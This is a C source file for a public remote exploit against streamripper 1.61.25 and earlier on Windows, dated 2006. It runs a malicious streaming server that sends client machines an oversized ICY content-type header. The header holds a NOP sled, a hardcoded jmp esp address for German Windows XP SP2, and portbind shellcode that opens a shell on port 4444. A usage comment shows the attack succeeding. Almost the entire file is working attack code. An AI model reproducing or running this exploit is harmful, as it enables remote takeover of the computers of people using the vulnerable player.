streamripper-1.txt

`/*   
* name: streamripper <= 1.61.25 win32 remote exploit  
*   
* bug by: Ulf Harnhammar  
* status: public   
* exploit: psylocn  
* payload: portbind 4444  
* **********************************************************  
* K:\>exploit.exe 80 0  
* [ public-release ]   
* streamripper <= 1.61.25 remote exploit   
* exploit by psylocn 2006   
* bug by Ulf Harnhammar   
*   
* [+] server started!   
* [+] server waits   
*   
*   
* go to next shell  
* K:\>streamripper.exe http://127.0.0.1:80  
* Connecting...  
*   
* on other shell  
* [+] client conneted!   
* [+] exploit send check shell on port 4444   
*  
* now connect to 127.0.0.1:4444   
*/  
  
/* #define _WIN32 */   
  
#include <stdio.h>   
#include <stdlib.h>   
#include <string.h>   
  
#ifdef _WIN32   
#include <winsock2.h>   
#pragma comment(lib, "ws2_32")   
#else   
#include <sys/types.h>   
#include <netinet/in.h>   
#include <sys/socket.h>   
#endif   
  
/* portbind shellcode port 4444*/   
unsigned char portbindsc[] =   
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"  
"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"  
"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"  
"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"  
"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"  
"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"  
"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"  
"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"  
"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"  
"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"  
"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"  
"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"  
"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"  
"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"  
"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"  
"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"  
"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"  
"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"  
"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"  
"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"  
"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"  
"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";   
  
char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"  
"icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7<BR>\r\n"  
"icy-name:Radioseven - www.radio.de\r\n"  
"icy-genre:Dance Trance House\r\n"  
"icy-url:http://www.radio.de\r\n"  
"content-type:"; //buffer to exploit  
  
char part2[] = "\r\n"  
"icy-pub:1\r\n"  
"icy-metaint:8192\r\n"  
"icy-br:CCCCCCC\r\n\r\n";  
  
char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp  
  
struct targets {   
int num;   
char name[50];   
long jmpaddr;   
}   
target[]= {   
{ 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp   
{ 1, "debug [testing] ", 0x41414141 },  
};   
  
void Usage(){  
  
int i;  
printf("Usage: exploit.exe port target\n\n"   
"Targets:\n\n");  
for (i = 0; i < 2; i++)  
{  
if(target[i].name != 0)  
fprintf(stderr," [%u] %s\n",i,target[i].name);  
else  
break;  
}  
exit(1);  
}   
  
int main (int argc, char **argv) {   
  
char *host;   
struct sockaddr_in my_addr;  
struct sockaddr_in their_addr;  
int sockfd,port,new_sock,sin_size=sizeof (their_addr);   
  
  
char buffer[3565];   
  
#ifdef _WIN32   
WSADATA wsa;   
#endif   
  
  
#ifdef _WIN32   
WSAStartup(MAKEWORD(2,0), &wsa);   
#endif   
  
printf("[ public-release ]\n");  
printf("\tstreamripper <= 1.61.25 remote exploit \n");   
printf("\texploit by psylocn 2006\n");   
printf("\tbug by Ulf Harnhammar\n\n");   
  
unsigned long ntarget = 0;  
if (argc < 3) Usage();   
if ((ntarget = atoi(argv[2])) > 1) Usage();   
  
port = (unsigned short)atoi(argv[1]);  
  
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {   
printf("[-] socket error\n");   
return 0;   
}  
  
my_addr.sin_family = AF_INET;   
my_addr.sin_port = htons(port);  
my_addr.sin_addr.s_addr = INADDR_ANY;   
  
if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {   
printf("\n[-] bind error\n");   
return 0;   
}  
else printf ("[+] server started!\n");  
  
if (listen (sockfd, 3) == SOCKET_ERROR) {   
printf("\n[-] listen error\n");   
return 0;   
}  
printf ("[+] server waits\n");  
  
if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size)) == INVALID_SOCKET) {   
printf("\n[-] accept error\n");   
return 0;   
}  
else  
printf ("[+] client conneted!\n");  
  
memset ( buffer, 0x90, sizeof(buffer) - 1 );  
memcpy ( buffer, part1, strlen(part1) );  
memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);  
memcpy ( buffer+3150, fixstack,strlen(fixstack) );  
memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));  
  
memcpy ( buffer+3515, part2, sizeof(part2) );  
  
if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {   
printf("[-] send error\n");   
return 0;   
}  
sleep(2000);  
printf("[+] exploit send check shell on port 4444\n");   
  
closesocket(sockfd);   
#ifdef _WIN32   
WSACleanup ();  
#endif   
return 0;   
}   
`